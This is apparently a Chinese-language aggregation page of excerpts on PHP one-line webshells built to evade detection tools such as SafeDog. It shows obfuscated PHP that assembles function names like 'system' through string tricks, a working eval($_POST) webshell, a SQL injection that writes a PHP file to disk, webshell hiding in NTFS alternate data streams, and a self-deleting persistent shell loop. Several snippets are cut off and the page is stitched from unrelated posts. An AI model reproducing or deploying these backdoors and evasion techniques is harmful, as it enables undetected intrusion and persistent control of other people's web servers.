分享几个好玩的过狗一句话

之前玩CTF遇到一个一句话很有意思,于是就把之前收藏的文章拿出来看看,学习一下,同时分享给各位。所有的吗都是在前人的基础上稍作修改,对于一些关键点会稍作解释,方便大家理解。

第一种

隐藏关键字,通过对单个字符变量进行++操作来获取其他字符,再进行拼接得到我们想要的函数。


1
2
3
4
5
6
7
8
@$_=[].'';        //PHP5.3之后(不包括5.3)才能这么用,数组被强制转换成字符串,获取字符串Array,等下要用到A
@$___=$_[''];     //获取A字符,这里的空字符串会被转换成0,即['']变成[0]

$_ = 'A';
$_++;//$_的值为A

$__ = "Z";
$__++;//$__的值为AA,而不会是ASCII字符Z

php一句话木马检测绕过研究

0x00: 前言一般的,利用能够执行系统命令、加载代码的函数,或者组合一些普通函数,完成一些高级间谍功能的网站后门的脚本,叫做Webshell。本篇文章主要探讨关于PHP语言的Webshell检测工具和平台的绕过方法,实现能够绕过以下表格中7个主流(基本代表安全行业内PHP Webshell检测的一流水平)专业工具和平台检测的PHP Webshell,构造出零提示、无警告、无法被检测到的一句话木马后门。编号名称参考链接1网站安全狗网马查杀http://download.safedog.cn/do

webshell爆破脚本

H]4W3H4X}3GC)EJ1KE9(Q.png

发一个过狗一句话

过狗一句话

中国菜刀专用过狗免杀PHP一句话

   中国菜刀专用过狗一句话

php过狗一句话

<?php
/*

isDog

*/
                // $a assert
        $a = "0,1,2,3,4,5,s,y,s,t,e,m";
        // 根据','转换成数组
        $array = explode(",",$a);
                // 空变量


过狗过云锁一句话

thum-4a471512647354.jpg

mysql注入写文件

1.select * from admin where id =-1 union select 1,'<?php phpinfo();?>',3,4 into outfile 'c:\\1.php' 2.select * from admin where id&nb

利用ADS隐藏webshell

0X01 前言  未知攻,焉知防,在web端如何做手脚维护自己拿到的权限呢?首先要面临的是webshell查杀,那么通过利用ADS隐藏webshell,不失为一个好办法。0X02 利用ADS隐藏webshell  关于ADS的介绍,就不再阐述,详见尾部参考资料。  PHP 一句话木马:<?php @eval($_POST['chopper']);?>,当然也可以直接制作免杀PHP一句话,毕竟PHP千变万化,从变量,数组,赋值,运算,函数等,各种变种。。。 

php不死shell

<?php       set_time_limit(0);       ignore_user_abort(1);       unlink(__FILE__);       while(1){     &nbs